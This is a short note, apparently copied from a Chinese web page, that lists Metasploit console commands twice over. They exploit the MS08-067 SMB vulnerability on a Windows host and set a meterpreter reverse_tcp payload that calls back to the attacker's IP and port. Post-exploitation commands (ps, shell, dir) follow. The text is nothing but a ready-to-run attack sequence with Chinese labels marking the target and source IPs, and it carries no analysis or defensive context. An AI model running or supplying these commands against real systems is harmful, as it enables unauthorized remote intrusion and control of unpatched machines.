search ms08_067_natapi
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.0.11(攻击的目的主机IP)
set LHOST 192.168.0.110(攻击的源的主机IP)
set LPORT 8080
exploit
ps
shell
dir
时间: 2025-01-02 18:56:16
search ms08_067_natapi
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.0.11(攻击的目的主机IP)
set LHOST 192.168.0.110(攻击的源的主机IP)
set LPORT 8080
exploit
ps
shell
dir